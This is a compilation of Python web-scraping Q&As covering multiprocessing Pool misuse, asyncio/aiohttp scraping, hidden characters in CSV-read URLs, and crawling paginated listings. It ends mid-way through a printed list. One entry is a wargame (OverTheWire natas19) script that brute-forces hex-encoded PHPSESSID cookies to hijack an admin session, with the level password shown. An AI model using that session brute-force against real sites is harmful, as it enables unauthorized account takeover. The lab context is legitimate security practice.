Weird error with Pool module and Beautiful Soup: Invalid URL 'h' - python

I am scraping a very large website with Beautiful Soup for a project and want to use the Pool module to speed it up. I am getting a weird error where it is not correctly reading the list of URLs; as far as I can tell it is just grabbing the first 'h'.
The entire code works perfectly if I do not use Pool, and the list of URLs is read properly. I am not sure if there is something weird about how you have to prepare the URLs when calling p.map(scrapeClauses, links), because if I simply call scrapeClauses(links) everything works.
Here is my main function:
if __name__ == '__main__':
    links = list()
    og = 'https://www.lawinsider.com'
    halflink = '/clause/limitation-of-liability'
    link = og + halflink
    links.append(link)
    i = 0
    while i < 50:
        try:
            nextLink = generateNextLink(link)
            links.append(nextLink)
            link = nextLink
            i += 1
        except:
            print('Only ', i, 'links found')
            i = 50
    start_time = time.time()
    print(links[0])
    p = Pool(5)
    p.map(scrapeClauses, links)
    p.terminate()
    p.join()
    #scrapeClauses(links)
and here is scrapeClauses():
def scrapeClauses(links):
    # header to avoid the site detecting the scraper
    headers = requests.utils.default_headers()
    headers.update({
        'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
    })
    # list of clauses
    allText = []
    number = 0
    for line in links:
        page_link = line
        print(page_link)
        page_response = requests.get(page_link, headers=headers)
        html_soup = BeautifulSoup(page_response.content, "html.parser")
        assignments = html_soup.find_all('div', class_='snippet-content')
        for i in range(len(assignments)):
            assignments[i] = assignments[i].get_text()
            # option to remove the assignment that precedes each clause
            # assignments[i] = assignments[i].replace('Assignment.', '', 1)
            allText.append(assignments[i])
            # change the index of the name of the word doc
            name = 'limitationOfLiability' + str(number) + '.docx'
            # some clauses have special characters that produce an error
            try:
                document = Document()
                stuff = assignments[i]
                document.add_paragraph(stuff)
                document.save(name)
                number += 1
            except:
                continue
I did not include generateNextLink() to save space, and because I am pretty sure the error is not in there, but if someone thinks it is I will provide it.
As you can see, I print(page_link) in scrapeClauses. If I am not using Pool, it prints all the normal links. But if I use Pool, a bunch of h's print out line after line. I then get an error that 'h' is not a valid URL. I will show the error output below.
https://www.lawinsider.com/clause/limitation-of-liability
h
h
h
h
h
h
h
h
h
h
h
h
h
h
h
h
h
multiprocessing.pool.RemoteTraceback:
"""
Traceback (most recent call last):
  File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\multiprocessing\pool.py", line 121, in worker
    result = (True, func(*args, **kwds))
  File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\multiprocessing\pool.py", line 44, in mapstar
    return list(map(*args))
  File "C:\Users\wquinn\Web Scraping\assignmentBSScraper.py", line 20, in scrapeClauses
    page_response = requests.get(page_link, headers=headers)
  File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\site-packages\requests\api.py", line 75, in get
    return request('get', url, params=params, **kwargs)
  File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\site-packages\requests\api.py", line 60, in request
    return session.request(method=method, url=url, **kwargs)
  File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\site-packages\requests\sessions.py", line 519, in request
    prep = self.prepare_request(req)
  File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\site-packages\requests\sessions.py", line 462, in prepare_request
    hooks=merge_hooks(request.hooks, self.hooks),
  File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\site-packages\requests\models.py", line 313, in prepare
    self.prepare_url(url, params)
  File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\site-packages\requests\models.py", line 387, in prepare_url
    raise MissingSchema(error)
requests.exceptions.MissingSchema: Invalid URL 'h': No schema supplied. Perhaps you meant http://h?

The second argument of p.map takes an iterable such as a list. Each element of that iterable is passed to the function individually, so your function receives a single string rather than the list of strings you expect.
The minimal example is:
from multiprocessing import Pool

def f(str_list):
    for x in str_list:
        print('hello {}'.format(x))

if __name__ == '__main__':
    str_list = ['111', '2', '33']
    p = Pool(5)
    p.map(f, str_list)
    p.terminate()
    p.join()
Output is:
hello 1
hello 1
hello 1
hello 2
hello 3
hello 3
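Applied to the question, the fix is to have scrapeClauses accept a single URL and let Pool.map supply one link per call. A trimmed sketch (not the asker's full function) of what that could look like:

from multiprocessing import Pool
import requests
from bs4 import BeautifulSoup

def scrapeClauses(page_link):  # receives ONE url per call from Pool.map
    headers = requests.utils.default_headers()
    headers.update({
        'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
    })
    page_response = requests.get(page_link, headers=headers)
    html_soup = BeautifulSoup(page_response.content, "html.parser")
    # return the clause texts; workers run in separate processes, so
    # appending to a shared list would not be visible in the parent
    return [div.get_text() for div in html_soup.find_all('div', class_='snippet-content')]

if __name__ == '__main__':
    links = ['https://www.lawinsider.com/clause/limitation-of-liability']  # plus the generated links
    with Pool(5) as p:
        results = p.map(scrapeClauses, links)  # one list of clause texts per URL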


Can't put result of hexlify as cookie in requests.post

So the issue is with this code.
import requests
import string
import binascii
import codecs

url = "http://natas19.natas.labs.overthewire.org/"
user = "natas19"
passwd = "8LMJEhKFbMKIL2mxQKjv0aEDdk7zpT0s"
cookie = dict(PHPSESSID="0")
test = "{}-admin"

for i in range(0, 641):
    with requests.Session() as sesh:
        encoded = binascii.hexlify(bytes(test.format(i), "utf-8"))
        print("Trying: " + str(i) + "-admin")
        print(encoded)
        cookie = dict(PHPSESSID=encoded)
        sesh.post(url, auth=(user, passwd), cookies=cookie)
        r = sesh.get(url, auth=(user, passwd)).content
        print(r)
        print(sesh.cookies.get_dict())
        if "You are an admin." in str(r):
            print("Success! Admin website:\n" + str(sesh.get(url, auth=(user, passwd)).content))
            break
        else:
            print("Failed.")
The hexlify returns a value like b'302d61646d696e', but the post later on considers it a string for some reason:
Trying: 0-admin
b'302d61646d696e'
Traceback (most recent call last):
  File "C:/Users/jakub/Desktop/natas19.py", line 17, in <module>
    sesh.post(url,auth=(user,passwd),cookies=cookie)
  File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\sessions.py", line 635, in post
    return self.request("POST", url, data=data, json=json, **kwargs)
  File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\sessions.py", line 573, in request
    prep = self.prepare_request(req)
  File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\sessions.py", line 471, in prepare_request
    cookies = cookiejar_from_dict(cookies)
  File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\cookies.py", line 537, in cookiejar_from_dict
    cookiejar.set_cookie(create_cookie(name, cookie_dict[name]))
  File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\cookies.py", line 352, in set_cookie
    and cookie.value.startswith('"')
TypeError: startswith first arg must be bytes or a tuple of bytes, not str
If I decode the hexlify result instead then the code runs, but without sending the cookie. Please help and thank you in advance!
Try putting .decode('utf-8') at the end of the encoded = line:
import binascii
import requests

url = "http://natas19.natas.labs.overthewire.org/"
user = "natas19"
passwd = "8LMJEhKFbMKIL2mxQKjv0aEDdk7zpT0s"
cookie = dict(PHPSESSID="0")
test = "{}-admin"

for i in range(0, 641):
    with requests.Session() as sesh:
        encoded = binascii.hexlify(bytes(test.format(i), "utf-8")).decode('utf-8')  # <-- put decode() here!
        print("Trying: " + str(i) + "-admin")
        print(encoded)
        cookie = dict(PHPSESSID=encoded)
        sesh.post(url, auth=(user, passwd), cookies=cookie)
        r = sesh.get(url, auth=(user, passwd)).content
        print(r)
        print(sesh.cookies.get_dict())
        if "You are an admin." in str(r):
            print(
                "Success! Admin website:\n"
                + str(sesh.get(url, auth=(user, passwd)).content)
            )
            break
        else:
            print("Failed.")

Why does my second python async (scraping) function (which uses results from the first async (scraping) function) return no result?

Summary of what the program should do:
Step 1 (sync): Determine exactly how many pages need to be scraped.
Step 2 (sync): create the links to the pages to be scraped in a for-loop.
Step 3 (async): Use the link list from step 2 to get the links to the desired detail pages from each of these pages.
Step 4 (async): Use the result from step 3 to extract the detail information for each Hofladen (farm shop). This information is stored in a list for each farm shop, and each of these lists is appended to a global list.
Where do I have the problem?
The transition from step 3 to step 4 does not seem to work properly.
Traceback (most recent call last):
  File "/Users/REPLACED_MY_USER/PycharmProjects/PKI-Projekt/test_ttt.py", line 108, in <module>
    asyncio.run(main())
  File "/Users/REPLACED_MY_USER/miniconda3/envs/scrapy/lib/python3.10/asyncio/runners.py", line 44, in run
    return loop.run_until_complete(main)
  File "/Users/REPLACED_MY_USER/miniconda3/envs/scrapy/lib/python3.10/asyncio/base_events.py", line 649, in run_until_complete
    return future.result()
  File "/Users/REPLACED_MY_USER/PycharmProjects/PKI-Projekt/test_ttt.py", line 96, in main
    await asyncio.gather(*tasks_detail_infos)
  File "/Users/REPLACED_MY_USER/PycharmProjects/PKI-Projekt/test_ttt.py", line 61, in scrape_detail_infos
    data = JsonLdExtractor().extract(body_d)
  File "/Users/REPLACED_MY_USER/miniconda3/envs/scrapy/lib/python3.10/site-packages/extruct/jsonld.py", line 21, in extract
    tree = parse_html(htmlstring, encoding=encoding)
  File "/Users/REPLACED_MY_USER/miniconda3/envs/scrapy/lib/python3.10/site-packages/extruct/utils.py", line 10, in parse_html
    return lxml.html.fromstring(html, parser=parser)
  File "/Users/REPLACED_MY_USER/miniconda3/envs/scrapy/lib/python3.10/site-packages/lxml/html/__init__.py", line 873, in fromstring
    doc = document_fromstring(html, parser=parser, base_url=base_url, **kw)
  File "/Users/REPLACED_MY_USER/miniconda3/envs/scrapy/lib/python3.10/site-packages/lxml/html/__init__.py", line 761, in document_fromstring
    raise etree.ParserError(
lxml.etree.ParserError: Document is empty

Process finished with exit code 1
What did I do to isolate the problem?
In a first attempt I rewrote the async function append_detail_infos so that it no longer tries to create a list and append the values but only prints data[0]["name"].
This resulted in the error message
Traceback (most recent call last):
  File "/Users/REPLACED_MY_USER/PycharmProjects/PKI-Projekt/test_ttt.py", line 108, in <module>
    asyncio.run(main())
  File "/Users/REPLACED_MY_USER/miniconda3/envs/scrapy/lib/python3.10/asyncio/runners.py", line 44, in run
    return loop.run_until_complete(main)
  File "/Users/REPLACED_MY_USER/miniconda3/envs/scrapy/lib/python3.10/asyncio/base_events.py", line 649, in run_until_complete
    return future.result()
  File "/Users/REPLACED_MY_USER/PycharmProjects/PKI-Projekt/test_ttt.py", line 96, in main
    await asyncio.gather(*tasks_detail_infos)
  File "/Users/REPLACED_MY_USER/PycharmProjects/PKI-Projekt/test_ttt.py", line 61, in scrape_detail_infos
    data = JsonLdExtractor().extract(body_d)
  File "/Users/REPLACED_MY_USER/miniconda3/envs/scrapy/lib/python3.10/site-packages/extruct/jsonld.py", line 21, in extract
    tree = parse_html(htmlstring, encoding=encoding)
  File "/Users/REPLACED_MY_USER/miniconda3/envs/scrapy/lib/python3.10/site-packages/extruct/utils.py", line 10, in parse_html
    return lxml.html.fromstring(html, parser=parser)
  File "/Users/REPLACED_MY_USER/miniconda3/envs/scrapy/lib/python3.10/site-packages/lxml/html/__init__.py", line 873, in fromstring
    doc = document_fromstring(html, parser=parser, base_url=base_url, **kw)
  File "/Users/REPLACED_MY_USER/miniconda3/envs/scrapy/lib/python3.10/site-packages/lxml/html/__init__.py", line 761, in document_fromstring
    raise etree.ParserError(
lxml.etree.ParserError: Document is empty

Process finished with exit code 1
In the next attempt, I exported the links from detail_links as .csv and visually checked them and opened some of them to see if they were valid. This was also the case.
The program code:
import asyncio
import time

import aiohttp
import requests
import re
from selectolax.parser import HTMLParser
from extruct.jsonld import JsonLdExtractor
import pandas as pd

BASE_URL = "https://hofladen.info"
FIRST_PAGE = 1


def get_last_page(url: str) -> int:
    res = requests.get(url).text
    html = HTMLParser(res)
    last_page = int(re.findall("(\d+)", html.css("li.page-last > a")[0].attributes["href"])[0])
    return last_page


def build_links_to_pages(start: int, ende: int) -> list:
    lst = []
    for i in range(start, ende + 1):
        url = f"https://hofladen.info/regionale-produkte?page={i}"
        lst.append(url)
    return lst


async def scrape_detail_links(url: str):
    async with aiohttp.ClientSession() as session:
        async with session.get(url, allow_redirects=True) as resp:
            body = await resp.text()
            html = HTMLParser(body)
            for node in html.css(".sp13"):
                detail_link = BASE_URL + node.attributes["href"]
                detail_links.append(detail_link)


async def append_detail_infos(data):
    my_detail_lst = []
    # print(data[0]["name"])  # name for debugging purposes
    my_detail_lst.append(data[0]["name"])  # name
    my_detail_lst.append(data[0]["address"]["streetAddress"])  # street
    my_detail_lst.append(data[0]["address"]["postalCode"])  # postal code
    my_detail_lst.append(data[0]["address"]["addressLocality"])  # town
    my_detail_lst.append(data[0]["address"]["addressRegion"])  # federal state
    my_detail_lst.append(data[0]["address"]["addressCountry"])  # country
    my_detail_lst.append(data[0]["geo"]["latitude"])  # latitude
    my_detail_lst.append(data[0]["geo"]["longitude"])  # longitude
    detail_infos.append(my_detail_lst)


async def scrape_detail_infos(detail_link: str):
    async with aiohttp.ClientSession() as session_detailinfos:
        async with session_detailinfos.get(detail_link) as res_d:
            body_d = await res_d.text()
            data = JsonLdExtractor().extract(body_d)
            await append_detail_infos(data)


async def main() -> None:
    start_time = time.perf_counter()

    # begin individual code
    # ----------
    global detail_links, detail_infos
    detail_links, detail_infos = [], []
    tasks = []
    tasks_detail_infos = []

    # extract the last page to iterate over
    last_page = get_last_page("https://hofladen.info/regionale-produkte")

    # scrape detail links
    links_to_pages = build_links_to_pages(FIRST_PAGE, last_page)
    for link in links_to_pages:
        task = asyncio.create_task(scrape_detail_links(link))
        tasks.append(task)
    print("Saving the output of extracted information.")
    await asyncio.gather(*tasks)
    pd.DataFrame(data=detail_links).to_csv("detail_links.csv")

    # scrape detail infos
    for detail_url in detail_links:
        task_detail_infos = asyncio.create_task(scrape_detail_infos(detail_url))
        tasks_detail_infos.append(task_detail_infos)
    await asyncio.gather(*tasks_detail_infos)
    # end individual code
    # ------------

    time_difference = time.perf_counter() - start_time
    print(f"Scraping time: {time_difference} seconds.")
    print(len(detail_links))
    # print(detail_infos[])


asyncio.run(main())
A working solution to the problem:
added allow_redirects=True to async with session_detailinfos.get(detail_link, allow_redirects=True) as res_d:
added return_exceptions=True to await asyncio.gather(*tasks_detail_infos, return_exceptions=True)
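For clarity, here is a simplified sketch of those two changes in context; it assumes the same libraries as the question and returns the extracted JSON-LD data instead of appending to the global lists:

import asyncio
import aiohttp
from extruct.jsonld import JsonLdExtractor

async def scrape_detail_infos(detail_link: str):
    async with aiohttp.ClientSession() as session:
        # allow_redirects=True so redirected detail pages yield real HTML, not an empty body
        async with session.get(detail_link, allow_redirects=True) as res_d:
            body_d = await res_d.text()
            return JsonLdExtractor().extract(body_d)

async def run(detail_links):
    tasks = [asyncio.create_task(scrape_detail_infos(u)) for u in detail_links]
    # return_exceptions=True keeps one bad page from cancelling the whole batch
    return await asyncio.gather(*tasks, return_exceptions=True)

# results = asyncio.run(run(detail_links))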

Unexpected space (not sure what type of character this space is) while parsing csv file in python

I am iterating through a list of URLs from a csv file, trying to locate their sitemaps, but I am getting a weird leading-space issue that causes an error when requests processes each URL. I'm trying to figure out what's causing this space to be generated and what type of space it is. I believe something funky is happening with strip(), because I can get this to run fine when copying and pasting a URL into requests. I am just not sure what type of space this is and what's causing it to occur.
Wondering if anyone else is having or had this issue?
So far I have tried to solve it using the following methods:
replace()
"".join(split())
regex
Here is my code:
with open('links.csv') as f:
    for line in f:
        strdomain = line.strip()
        if strdomain:
            domain = strdomain
            fix_domain = domain.replace('https://', '').replace('www', '').replace('/', '').replace('.', '').replace(' ', '')
            ofile = fix_domain + '.txt'  # args.ofile
            domain_rem = domain
            map = find_sitemap.get_sitemap(domain_rem + "sitemap.xml")
            url_info = find_sitemap.parse_sitemap(map)
            print("Found {0} urls".format(len(url_info)))
            new_urls = []
            for u in url_info:
                new_urls.append(u)
                print(u)
links.csv looks like the following, with just one column:
https://site1.com/
https://site2.com/
https://site3.com/
I printed domain and strdomain and even added the word "this" next to the variable domain so you can see the space being produced clearly:
Here is the error I receive in full when running (you will notice there is no leading space within the URL after I've copied and pasted it from the terminal into here; however, I provide an image of my terminal below so you can see it):
Traceback (most recent call last):
  File "/Users/natehurwitz/PROJECTS/axis/axis/apps/axisDataFinder/map_website.py", line 358, in <module>
    main()
  File "/Users/natehurwitz/PROJECTS/axis/axis/apps/axisDataFinder/map_website.py", line 318, in main
    map = find_sitemap.get_sitemap(domain_rem+"sitemap.xml")
  File "/Users/natehurwitz/PROJECTS/axis/axis/apps/axisDataFinder/find_sitemap.py", line 5, in get_sitemap
    get_url = requests.get(url)
  File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/api.py", line 72, in get
    return request('get', url, params=params, **kwargs)
  File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/api.py", line 58, in request
    return session.request(method=method, url=url, **kwargs)
  File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/sessions.py", line 522, in request
    resp = self.send(prep, **send_kwargs)
  File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/sessions.py", line 636, in send
    adapter = self.get_adapter(url=request.url)
  File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/sessions.py", line 727, in get_adapter
    raise InvalidSchema("No connection adapters were found for '%s'" % url)
requests.exceptions.InvalidSchema: No connection adapters were found for 'https://blkgrn.com/sitemap.xml'
Here is where you can see the leading space that occurs
Here is the code for "find_sitemap.py":
from bs4 import BeautifulSoup
import requests


def get_sitemap(url):
    get_url = requests.get(url)
    if get_url.status_code == 200:
        return get_url.text
    else:
        print('Unable to fetch sitemap: %s.' % url)


def process_sitemap(s):
    soup = BeautifulSoup(s, "lxml")
    result = []
    for loc in soup.findAll('loc'):
        item = {}
        item['loc'] = loc.text
        item['tag'] = loc.parent.name
        if loc.parent.lastmod is not None:
            item['lastmod'] = loc.parent.lastmod.text
        if loc.parent.changeFreq is not None:
            item['changeFreq'] = loc.parent.changeFreq.text
        if loc.parent.priority is not None:
            item['priority'] = loc.parent.priority.text
        result.append(item)
    return result


def is_sub_sitemap(s):
    if s['loc'].endswith('.xml') and s['tag'] == 'sitemap':
        return True
    else:
        return False


def parse_sitemap(s):
    sitemap = process_sitemap(s)
    result = []
    while sitemap:
        candidate = sitemap.pop()
        if is_sub_sitemap(candidate):
            sub_sitemap = get_sitemap(candidate['loc'])
            for i in process_sitemap(sub_sitemap):
                sitemap.append(i)
        else:
            result.append(candidate)
    return result
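For pinning down which character is actually sneaking in, one illustrative approach (not part of the original post) is to print the repr() of each line and name any non-ASCII code points, which makes things like a BOM ('\ufeff') or a zero-width space ('\u200b') visible:

import unicodedata

with open('links.csv') as f:
    for line in f:
        print(repr(line))  # hidden characters show up in the repr
        for ch in line:
            if not ch.isascii():
                print(hex(ord(ch)), unicodedata.name(ch, 'UNKNOWN'))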

Multiprocessing with text scraping

I want to scrape <p> elements from pages, and since there will be a couple of thousand of them I want to use multiprocessing. However, it doesn't work when I try to append the result to a variable.
I want to append the result of scraping to data = []
I made a url_common for a base website since some pages don't start with HTTP etc.
from tqdm import tqdm
import faster_than_requests as requests  # 20% faster on average in my case than urllib.request
import bs4 as bs


def scrape(link, data):
    for i in tqdm(link):
        if i[:3] != 'htt':
            url_common = 'https://www.common_url.com/'
        else:
            url_common = ''
        try:
            ht = requests.get2str(url_common + str(i))
        except:
            pass
        parsed = bs.BeautifulSoup(ht, 'lxml')
        paragraphs = parsed.find_all('p')
        for p in paragraphs:
            data.append(p.text)
The above doesn't work, since map() doesn't accept a function like that.
I tried to use it another way:
def scrape(link):
    for i in tqdm(link):
        if i[:3] != 'htt':
            url_common = 'https://www.common_url.com/'
        else:
            url_common = ''
        try:
            ht = requests.get2str(url_common + str(i))
        except:
            pass
        parsed = bs.BeautifulSoup(ht, 'lxml')
        paragraphs = parsed.find_all('p')
        for p in paragraphs:
            print(p.text)


from multiprocessing import Pool

p = Pool(10)
links = ['link', 'other_link', 'another_link']
data = p.map(scrape, links)
I get this error while using the above function:
Traceback (most recent call last):
  File "C:\ProgramData\Anaconda3\lib\multiprocessing\process.py", line 297, in _bootstrap
    self.run()
  File "C:\ProgramData\Anaconda3\lib\multiprocessing\process.py", line 99, in run
    self._target(*self._args, **self._kwargs)
  File "C:\ProgramData\Anaconda3\lib\multiprocessing\pool.py", line 110, in worker
    task = get()
  File "C:\ProgramData\Anaconda3\lib\multiprocessing\queues.py", line 354, in get
    return _ForkingPickler.loads(res)
AttributeError: Can't get attribute 'scrape' on <module '__main__' (built-in)>
I have not figured out a way to do it so that it uses Pool and at the same time appends the result of scraping to the given variable.
EDIT
I changed it a little bit to see where it stops:
def scrape(link):
    for i in tqdm(link):
        if i[:3] != 'htt':
            url_common = 'https://www.investing.com/'
        else:
            url_common = ''
        try:  # tries are always helpful with urls as you never know
            ht = requests.get2str(url_common + str(i))
        except:
            pass
        print('works1')
        parsed = bs.BeautifulSoup(ht, 'lxml')
        paragraphs = parsed.find_all('p')
        print('works2')
        for p in paragraphs:
            print(p.text)


links = ['link', 'other_link', 'another_link']

scrape(links)
# WORKS PROPERLY AND PRINTS EVERYTHING

if __name__ == '__main__':
    p = Pool(5)
    print(p.map(scrape, links))
    # DOESN'T WORK, NOTHING PRINTS. Error like above
You are using the map function incorrectly.
It iterates over each element of the iterable and calls the function on each element.
You can see the map function as doing something like the following:
to_be_mapped = [1, 2, 3]
mapped = []


def mapping(x):  # <-- note that the mapping accepts a single value
    return x**2


for item in to_be_mapped:
    res = mapping(item)
    mapped.append(res)
So to solve your problem, remove the outermost for-loop, since the iteration is handled by the map function:
def scrape(link):
    if link[:3] != 'htt':
        url_common = 'https://www.common_url.com/'
    else:
        url_common = ''
    try:
        ht = requests.get2str(url_common + str(link))
    except:
        pass
    parsed = bs.BeautifulSoup(ht, 'lxml')
    paragraphs = parsed.find_all('p')
    for p in paragraphs:
        print(p.text)
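To also collect the paragraphs instead of printing them, which was the original goal, one possible variant (a sketch building on the above; common_url.com and get2str are taken from the question) returns them from the worker and lets Pool.map gather the per-link results:

from multiprocessing import Pool
import bs4 as bs
import faster_than_requests as requests


def scrape(link):
    url_common = '' if link[:3] == 'htt' else 'https://www.common_url.com/'
    try:
        ht = requests.get2str(url_common + str(link))
    except Exception:
        return []  # skip links that fail to download
    parsed = bs.BeautifulSoup(ht, 'lxml')
    return [p.text for p in parsed.find_all('p')]


if __name__ == '__main__':
    links = ['link', 'other_link', 'another_link']
    with Pool(10) as pool:
        per_link = pool.map(scrape, links)       # one list of paragraphs per link
    data = [p for sub in per_link for p in sub]  # flatten into a single list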

How to scrape many dynamic urls in Python

I want to scrape one dynamic URL at a time.
What I did is scrape the URLs that I get from all the hrefs, and then I want to scrape each of those URLs.
What I am trying:
from bs4 import BeautifulSoup
import urllib.request
import re

r = urllib.request.urlopen('http://i.cantonfair.org.cn/en/ExpExhibitorList.aspx?k=glassware')
soup = BeautifulSoup(r, "html.parser")
links = soup.find_all("a", href=re.compile(r"expexhibitorlist\.aspx\?categoryno=[0-9]+"))
linksfromcategories = ([link["href"] for link in links])

string = "http://i.cantonfair.org.cn/en/"
str1 = [string + x for x in linksfromcategories]
fulllinksfromcategories = '\n'.join(str1)

lfc = urllib.request.urlopen(fulllinksfromcategories).read()
soup2 = BeautifulSoup(lfc, "html.parser")
print(soup2)
But it gives me the following error:
Traceback (most recent call last):
  File "D:\python\scarpepython.py", line 50, in <module>
    lfc = urllib.request.urlopen(fulllinksfromcategories).read()
  File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\urllib\request.py", line 162, in urlopen
    return opener.open(url, data, timeout)
  File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\urllib\request.py", line 465, in open
    response = self._open(req, data)
  File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\urllib\request.py", line 483, in _open
    '_open', req)
  File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\urllib\request.py", line 443, in _call_chain
    result = func(*args)
  File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\urllib\request.py", line 1268, in http_open
    return self.do_open(http.client.HTTPConnection, req)
  File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\urllib\request.py", line 1243, in do_open
    r = h.getresponse()
  File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\http\client.py", line 1174, in getresponse
    response.begin()
  File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\http\client.py", line 282, in begin
    version, status, reason = self._read_status()
  File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\http\client.py", line 264, in _read_status
    raise BadStatusLine(line)
http.client.BadStatusLine:
This could be an option using lxml:
from sys import exit
from pprint import pprint
import lxml.html
import requests
import re

url = 'http://i.cantonfair.org.cn/en/ExpExhibitorList.aspx?k=glassware&page=1'
doc = requests.get(url)
root = lxml.html.fromstring(doc.text)

regexp_total_pages = re.compile(r"Pages\s\d\/(\d+)")
text_total_pages = root.xpath('//*[@id="AspNetPager1"]/div[1]/text()')[0].strip()
total_pages = int(re.match(regexp_total_pages, text_total_pages).group(1))

all_links = list()
for i in range(1, total_pages + 1):
    url = "http://i.cantonfair.org.cn/en/ExpExhibitorList.aspx?k=glassware&page={page}".format(page=i)
    doc = requests.get(url)
    root = lxml.html.fromstring(doc.text)
    all_links.append(root.xpath('//*[@id="form1"]/div[*]/div[*]/h3/a/@href'))

pprint(all_links)
Output:
[['expCompany.aspx?corpid=0776011226',
'expCompany.aspx?corpid=0767408756',
'expCompany.aspx?corpid=0768210055',
'expCompany.aspx?corpid=0797720568',
'expCompany.aspx?corpid=0732708199',
'expCompany.aspx?corpid=0793210033',
'expCompany.aspx?corpid=0732106474',
'expCompany.aspx?corpid=0758010034',
'expCompany.aspx?corpid=0971067386',
'expCompany.aspx?corpid=0740321671'],
['expCompany.aspx?corpid=0778019678',
'expCompany.aspx?corpid=0856547211',
'expCompany.aspx?corpid=0786118468',
'expCompany.aspx?corpid=0836547578',
'expCompany.aspx?corpid=0898829143',
'expCompany.aspx?corpid=0785822466',
'expCompany.aspx?corpid=0886647641',
'expCompany.aspx?corpid=0965278225',
'expCompany.aspx?corpid=0889552449',
'expCompany.aspx?corpid=0757118156'],
['expCompany.aspx?corpid=0800629095',
'expCompany.aspx?corpid=0797100877',
'expCompany.aspx?corpid=0791001566',
'expCompany.aspx?corpid=0955274359',
'expCompany.aspx?corpid=0789803409',
'expCompany.aspx?corpid=0769413578',
'expCompany.aspx?corpid=0712314777',
'expCompany.aspx?corpid=0873048367',
'expCompany.aspx?corpid=0716520166',
'expCompany.aspx?corpid=1444012375'],
['expCompany.aspx?corpid=1020485398',
'expCompany.aspx?corpid=1218502245',
'expCompany.aspx?corpid=1197393480',
'expCompany.aspx?corpid=1366309374',
'expCompany.aspx?corpid=1204799012',
'expCompany.aspx?corpid=1078880722',
'expCompany.aspx?corpid=1367905785',
'expCompany.aspx?corpid=1427517382',
'expCompany.aspx?corpid=1377308235',
'expCompany.aspx?corpid=1437717128'],
['expCompany.aspx?corpid=1361609356',
'expCompany.aspx?corpid=1532524260',
'expCompany.aspx?corpid=1512425129',
'expCompany.aspx?corpid=1371110608',
'expCompany.aspx?corpid=1021582521',
'expCompany.aspx?corpid=0829323712',
'expCompany.aspx?corpid=0756508698',
'expCompany.aspx?corpid=0781315922',
'expCompany.aspx?corpid=0850325858',
'expCompany.aspx?corpid=0713405337'],
['expCompany.aspx?corpid=0895550135',
'expCompany.aspx?corpid=0736604457',
'expCompany.aspx?corpid=0761821937',
'expCompany.aspx?corpid=0853755897',
'expCompany.aspx?corpid=0807455302',
'expCompany.aspx?corpid=0763919269',
'expCompany.aspx?corpid=0736104221',
'expCompany.aspx?corpid=0796616555',
'expCompany.aspx?corpid=0804229227',
'expCompany.aspx?corpid=0746304700'],
['expCompany.aspx?corpid=0839047328',
'expCompany.aspx?corpid=0875628420',
'expCompany.aspx?corpid=0869651030',
'expCompany.aspx?corpid=0838653323',
'expCompany.aspx?corpid=0779107569',
'expCompany.aspx?corpid=0748806674',
'expCompany.aspx?corpid=0736602141',
'expCompany.aspx?corpid=0722715458',
'expCompany.aspx?corpid=0782910676',
'expCompany.aspx?corpid=0798114121'],
['expCompany.aspx?corpid=0830450037',
'expCompany.aspx?corpid=0723700490',
'expCompany.aspx?corpid=0889823692',
'expCompany.aspx?corpid=0984073042',
'expCompany.aspx?corpid=0726719753',
'expCompany.aspx?corpid=0742406942',
'expCompany.aspx?corpid=0742119461',
'expCompany.aspx?corpid=0728315987',
'expCompany.aspx?corpid=0818248812',
'expCompany.aspx?corpid=0750419352'],
['expCompany.aspx?corpid=0982275722',
'expCompany.aspx?corpid=0815756641',
'expCompany.aspx?corpid=0712604536',
'expCompany.aspx?corpid=0798617576',
'expCompany.aspx?corpid=0734217566',
'expCompany.aspx?corpid=0878728894',
'expCompany.aspx?corpid=0772422523',
'expCompany.aspx?corpid=0784607985',
'expCompany.aspx?corpid=0786204936',
'expCompany.aspx?corpid=0886423907'],
['expCompany.aspx?corpid=0789300431',
'expCompany.aspx?corpid=0779921604',
'expCompany.aspx?corpid=0794403082',
'expCompany.aspx?corpid=0769111680',
'expCompany.aspx?corpid=0746606839',
'expCompany.aspx?corpid=0896726003',
'expCompany.aspx?corpid=0886728390',
'expCompany.aspx?corpid=0841756743',
'expCompany.aspx?corpid=1010680461',
'expCompany.aspx?corpid=0837456503'],
['expCompany.aspx?corpid=0735317945',
